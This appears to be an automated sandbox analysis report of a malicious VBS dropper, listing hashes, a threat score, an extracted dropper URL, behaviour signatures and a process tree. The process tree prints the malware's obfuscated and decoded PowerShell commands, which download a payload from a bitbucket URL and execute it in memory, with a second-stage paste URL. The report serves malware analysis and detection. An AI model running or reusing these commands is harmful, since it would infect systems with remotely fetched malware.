Analysis

  • max time kernel
    122s
  • max time network
    123s
  • platform
    windows7_x64
  • resource
    win7-20240729-en
  • resource tags

    arch:x64, arch:x86, image:win7-20240729-en, locale:en-us, os:windows7-x64, system
  • submitted
    21-08-2024 10:11

General

  • Target

    43a46c8866fdd9b7fb23d0d2ab7a2676f0637333e500cf4e32ae3bc0b88028ae.vbs

  • Size

    2.7MB

  • MD5

    b6a6e732e7843e8af8468793eaaa294f

  • SHA1

    4de793698450915e784e3a7f9df99b5b74241979

  • SHA256

    43a46c8866fdd9b7fb23d0d2ab7a2676f0637333e500cf4e32ae3bc0b88028ae

  • SHA512

    e37f804bb9020e51ac1ba8381aeda15ad5a2dde6ac875478fe0c5e6d3dbcebc38b6ee752604b21174b8198752219ed98e4bd423a0c24e1fa541d2d18c89b6e24

  • SSDEEP

    768:pddddduddddddddduddddddddduddddddddduddddddddduddddddddduddddddo:TVKgi

Score
10/10

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
ps1.dropper

https://bitbucket.org/556ghfhgfhgf/fdsfdsf/downloads/dllhope.txt

Signatures

  • Blocklisted process makes network request 2 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs

    Using powershell.exe command.

  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 3 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Suspicious behavior: EnumeratesProcesses 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 2 IoCs
  • Suspicious use of WriteProcessMemory 6 IoCs

Processes

  • C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\43a46c8866fdd9b7fb23d0d2ab7a2676f0637333e500cf4e32ae3bc0b88028ae.vbs"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:2716
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $ExeNy = 'J▒Bq▒GQ▒aQBs▒Go▒I▒▒9▒C▒▒Jw▒w▒DE▒Jw▒7▒CQ▒bwBv▒Gc▒dQB2▒C▒▒PQ▒g▒Cc▒JQBw▒Ho▒QQBj▒E8▒ZwBJ▒G4▒TQBy▒CU▒Jw▒7▒Fs▒QgB5▒HQ▒ZQBb▒F0▒XQ▒g▒CQ▒Z▒Bu▒Hk▒c▒B5▒C▒▒PQ▒g▒Fs▒cwB5▒HM▒d▒Bl▒G0▒LgBD▒G8▒bgB2▒GU▒cgB0▒F0▒Og▒6▒EY▒cgBv▒G0▒QgBh▒HM▒ZQ▒2▒DQ▒UwB0▒HI▒aQBu▒Gc▒K▒▒g▒Cg▒TgBl▒Hc▒LQBP▒GI▒agBl▒GM▒d▒▒g▒E4▒ZQB0▒C4▒VwBl▒GI▒QwBs▒Gk▒ZQBu▒HQ▒KQ▒u▒EQ▒bwB3▒G4▒b▒Bv▒GE▒Z▒BT▒HQ▒cgBp▒G4▒Zw▒o▒Cc▒a▒B0▒HQ▒c▒Bz▒Do▒Lw▒v▒GI▒aQB0▒GI▒dQBj▒Gs▒ZQB0▒C4▒bwBy▒Gc▒Lw▒1▒DU▒NgBn▒Gg▒ZgBo▒Gc▒ZgBo▒Gc▒Zg▒v▒GY▒Z▒Bz▒GY▒Z▒Bz▒GY▒LwBk▒G8▒dwBu▒Gw▒bwBh▒GQ▒cw▒v▒GQ▒b▒Bs▒Gg▒bwBw▒GU▒LgB0▒Hg▒d▒▒n▒Ck▒KQ▒7▒Fs▒cwB5▒HM▒d▒Bl▒G0▒LgBB▒H▒▒c▒BE▒G8▒bQBh▒Gk▒bgBd▒Do▒OgBD▒HU▒cgBy▒GU▒bgB0▒EQ▒bwBt▒GE▒aQBu▒C4▒T▒Bv▒GE▒Z▒▒o▒CQ▒Z▒Bu▒Hk▒c▒B5▒Ck▒LgBH▒GU▒d▒BU▒Hk▒c▒Bl▒Cg▒JwBD▒Gw▒YQBz▒HM▒T▒Bp▒GI▒cgBh▒HI▒eQ▒z▒C4▒QwBs▒GE▒cwBz▒DE▒Jw▒p▒C4▒RwBl▒HQ▒TQBl▒HQ▒a▒Bv▒GQ▒K▒▒n▒Fo▒e▒BL▒Eg▒Rw▒n▒Ck▒LgBJ▒G4▒dgBv▒Gs▒ZQ▒o▒CQ▒bgB1▒Gw▒b▒▒s▒C▒▒WwBv▒GI▒agBl▒GM▒d▒Bb▒F0▒XQ▒g▒Cg▒Jw▒w▒C8▒S▒BP▒Hk▒ZQB4▒C8▒cg▒v▒GU▒ZQ▒u▒GU▒d▒Bz▒GE▒c▒▒v▒C8▒OgBz▒H▒▒d▒B0▒Gg▒Jw▒g▒Cw▒I▒▒k▒G8▒bwBn▒HU▒dg▒g▒Cw▒I▒▒n▒F8▒XwBf▒F8▒XwBf▒F8▒XwBf▒F8▒XwBf▒F8▒XwBf▒F8▒XwBf▒F8▒XwBf▒F8▒Xw▒t▒C0▒LQ▒t▒C0▒LQ▒t▒C0▒LQ▒t▒C0▒LQ▒t▒Cc▒L▒▒g▒CQ▒agBk▒Gk▒b▒Bq▒Cw▒I▒▒n▒DE▒Jw▒s▒C▒▒JwBS▒G8▒Z▒Bh▒Cc▒I▒▒p▒Ck▒Ow▒=';$KByHL = [system.Text.Encoding]::Unicode.GetString( [system.Convert]::FromBase64String( $ExeNy.replace('▒','A') ) );$KByHL = $KByHL.replace('%pzAcOgInMr%', 'C:\Users\Admin\AppData\Local\Temp\43a46c8866fdd9b7fb23d0d2ab7a2676f0637333e500cf4e32ae3bc0b88028ae.vbs');powershell -command $KByHL;
      2⤵
      • Command and Scripting Interpreter: PowerShell
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:1656
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$jdilj = '01';$ooguv = 'C:\Users\Admin\AppData\Local\Temp\43a46c8866fdd9b7fb23d0d2ab7a2676f0637333e500cf4e32ae3bc0b88028ae.vbs';[Byte[]] $dnypy = [system.Convert]::FromBase64String( (New-Object Net.WebClient).DownloadString('https://bitbucket.org/556ghfhgfhgf/fdsfdsf/downloads/dllhope.txt'));[system.AppDomain]::CurrentDomain.Load($dnypy).GetType('ClassLibrary3.Class1').GetMethod('ZxKHG').Invoke($null, [object[]] ('0/HOyex/r/ee.etsap//:sptth' , $ooguv , '_______________________-------------', $jdilj, '1', 'Roda' ));"
        3⤵
        • Blocklisted process makes network request
        • Command and Scripting Interpreter: PowerShell
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:2800

Network

MITRE ATT&CK Enterprise v15

Downloads

  • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\KF0HK8D6RWIFFU5I9K1O.temp

    Filesize

    7KB

    MD5

    517c7fc400ea40ccdc305fe5c0a979b3

    SHA1

    68ac047043dba1ff6dd61f001722174ae5482733

    SHA256

    3c8d244f509d48df085b504badb1c704e544a1b141ec053b9ddf0110404f9345

    SHA512

    3cb3a7bb2103964a1bf017f0e2bacdd9d65d725bb1b3d0549c2946b1b8358ea4f05e573f0479cab65cc8701f54e29846836887981993bc9437793aab00feac74

  • memory/1656-10-0x000007FEF57F0000-0x000007FEF618D000-memory.dmp

    Filesize

    9.6MB

  • memory/1656-9-0x000007FEF57F0000-0x000007FEF618D000-memory.dmp

    Filesize

    9.6MB

  • memory/1656-8-0x000007FEF57F0000-0x000007FEF618D000-memory.dmp

    Filesize

    9.6MB

  • memory/1656-7-0x000007FEF57F0000-0x000007FEF618D000-memory.dmp

    Filesize

    9.6MB

  • memory/1656-6-0x0000000002350000-0x0000000002358000-memory.dmp

    Filesize

    32KB

  • memory/1656-5-0x000000001B530000-0x000000001B812000-memory.dmp

    Filesize

    2.9MB

  • memory/1656-4-0x000007FEF5AAE000-0x000007FEF5AAF000-memory.dmp

    Filesize

    4KB

  • memory/1656-16-0x000007FEF57F0000-0x000007FEF618D000-memory.dmp

    Filesize

    9.6MB